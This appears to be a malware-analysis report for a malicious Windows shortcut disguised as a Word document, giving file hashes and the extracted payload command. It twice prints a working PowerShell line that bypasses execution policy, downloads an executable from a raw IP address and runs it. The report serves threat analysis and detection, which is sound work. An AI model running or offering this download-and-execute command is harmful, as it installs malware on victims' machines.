Malicious
Document.doc.lnk
LNK File | MD5: 8bf379efd813e2b19e3c0abf2dc08f05 | Size: 2.07 KB | application/x-ms-shortcut
LNK File
MD5: 8bf379efd813e2b19e3c0abf2dc08f05
Size: 2.07 KB
application/x-ms-shortcut
Infection Chain
Summary by MalvaGPT
Characteristics
|
Hash | Hash Value |
|---|---|
| MD5 | 8bf379efd813e2b19e3c0abf2dc08f05
|
| Sha1 | 74c021250ef2c027deb141d8f8b35329de082209
|
| Sha256 | 70a4afab44d6a9ecd7f42ab77972be074dec8383a47a2011eb0133a230a4fae3
|
| Sha384 | f98f81746296600c9372e59930becedb6c87985ff7e6e2cf22e798c7ed5c27eed7c990a3da624589011142cfa5c34c9b
|
| Sha512 | 04128b12a6071eb99ae2b16244d70ce00447ad3e613aa2038ddea59b79271d4190526dc73e6dc6c6b5cfa8bebe1b1ccc1caa76404d956e34672196480032146d
|
| SSDeep | 24:8VVJqMFXuvawAgqx+/ntSy9kerUMkWI9wCc5QgkgVBS9ZmT:8VemaquoyOerHypgkgVw9ZY
|
| TLSH | 2541C1161BD64725D3F84E3AE8BBE71099A97C1AFB138F5D0181929818516149C68F3E
|
File Structure
Document.doc.lnk
Malicious
[Lnk Summary]
Malicious
Artefacts
|
Name0 | Value |
|---|---|
| LNK: Command Execution | cmd.exe /c powershell.exe ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://178.16.54.109/spl.exe','%userprofile%\windrv.exe');Start-Process '%userprofile%\windrv.exe' |
Document.doc.lnk (2.07 KB)
File Structure
Document.doc.lnk
Malicious
[Lnk Summary]
Malicious
Characteristics
No malware configuration were found at this point.
Artefacts
|
Name0 | Value | Location |
|---|---|---|
| LNK: Command Execution | cmd.exe /c powershell.exe ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://178.16.54.109/spl.exe','%userprofile%\windrv.exe');Start-Process '%userprofile%\windrv.exe' Malicious |
Document.doc.lnk |
You must be signed in to post a comment.
You need a premium account to access this feature.
You must be signed in to post a comment.